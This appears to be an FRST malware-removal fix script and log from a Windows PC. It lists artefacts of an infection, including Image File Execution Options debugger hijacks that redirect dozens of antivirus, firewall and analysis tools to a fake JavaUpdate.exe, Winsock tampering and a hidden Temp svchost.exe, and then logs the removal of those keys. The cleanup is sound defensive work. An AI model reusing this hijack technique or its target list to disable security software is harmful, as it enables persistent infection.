IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe

GroupPolicy: Restriction <======= ATTENTION

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
cmd: netsh winsock reset

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

C:\ProgramData\tP5544K4.dat
C:\Users\Kevin\AppData\Local\Temp\svchost.exe

DeleteJunctionsIndirectory: C:\Windows\system64

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

Zip: C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4;C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m;C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt;C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt

EmptyTemp:
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\\Debugger => value removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\3.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\acs.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AdAwareDesktop.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AdAwareService.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AdAwareTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\adoronsfirewall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AgentSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\alertwall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ALMon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ALsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\alupdate.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AntiHook.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\app_firewall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\apvxdwin.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\armorwall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\as3pf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\asr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\aupdrun.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\authfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avas.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AvastSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AvastUi.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avcom.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AVK.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AVKProxy.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AVKService.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AVKTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avkwctl.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AVKWCtlx64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avkwctrl.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avmgma.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avpmapp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avtask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\aws.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\backgroundscanclient.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Bav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\bavhm.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BavSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BavTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BavUpdater.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BavWebClient.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BDSSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\bgctl.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\bgnt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BgScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\blackd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\blackice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\blinksvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\bootsafe.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BullGuard.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BullGuardUpdate.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\BullGuarScanner.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\capinfos.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavApp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cavasm.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavAUD.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavCons.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavEmSrv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Cavmr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavMud.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Cavoar.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavQ.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavSn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavSub.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavUMAS.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CavUserUpd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Cavvl.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cavwp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cdas17.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cdas2.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cdinstx.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CEmRep.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cis.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CisTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clamd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\clamscan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ClamTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ClamWin.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CMain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cmdagent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cmgrdian.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\configmgr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\configuresav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CONSCTLX.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\coreFrameworkHost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\coreServiceShell.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\cpd.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\csi-eui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CV.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DCSUserProt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dlservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dltray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dragon_updater.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dumpcap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dvpapi.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\dwengine.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\econceal.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\econser.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\editcap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ekern.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ekrn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\emlproui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\EMLPROXY.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\endtaskpro.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\escanmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\escanpro.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\espwatch.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Ethereal.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fameh32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fgui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\filedeleter.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\filemon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\firewall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\firewall2004.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\firewallgui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FPAVServer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FProtTray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FPWin.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\freshclam.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\freshclamwrap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fsgk32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FSHDLL64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fshoster32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FSM32.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FSMA32.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fsorsp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fsrt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fssm32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\fwsrv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\gateway.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GDKBFltExe32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GDSC.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GDScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GpChromeDatabasegInx64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\guardxkickoff_x64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\guardxservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hpf_.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\iface.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\InstLsp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\invent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ipatrol.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ipcserver.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ipctray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\iptray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7AVScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7CrvSvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7EmlPxy.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7FWSrvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7PSSrvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7RTScan.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7SysMon.Exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7TSecurity.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7TSMain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\K7TSMngr.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\kav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\kpf4gui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\kpf4ss.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\licwiz.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Lite.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\LittleHook.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\livehelp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\lookout.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\lpfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbam.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamscheduler.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mcods.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MCS-Uninstall.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MCShieldCCC.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MCShieldDS.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MCShieldRTM.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mcvsescn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mergecap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MpCmdRun.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mpf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mpfcm.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MpUXSrv.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MSASCui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\msconfig.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MsMpEng.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\msseces.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MWAGENT.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MWASER.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nanoav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nanosvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\navapsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nbrowser.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Netcap.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Netguard" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\netguardlite.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Netmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nfservice.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\njeeves2.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nnf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nod32.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nod32krn.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nprosec.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\NS.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nseupdatesvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nstzerospywarelite.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvcod.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvcsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nvoy.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\nwscmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\oasclnt.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\omnitray.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OnAccessInstaller.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ONLINENT.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\opf.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\opfsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\OPSSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\op_mon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\outpost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Packetizer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\Packetyzer.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pcipprev.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pctav.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pctavsvc.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pcviper.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\persfw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pfft.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pgaccount.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\prevxcsi.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\prifw.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\privatefirewall" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\privatefirewall3.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ProcessHacker.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procexp.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procguard.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\procmon.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\protect.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSANHost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSUAMain.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PSUAService.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtSessionAgent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtSvcHost.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\PtWatchDog.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\pxagent.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\QUHLPSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rawshark.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\RDTask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\regedit.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\rtt_crc_service.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sab_wab.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\sagui.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SAPISSVC.EXE" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SASCore64.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\SASTask.exe" => key removed successfully
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\savadminservice.exe" => key removed successfully
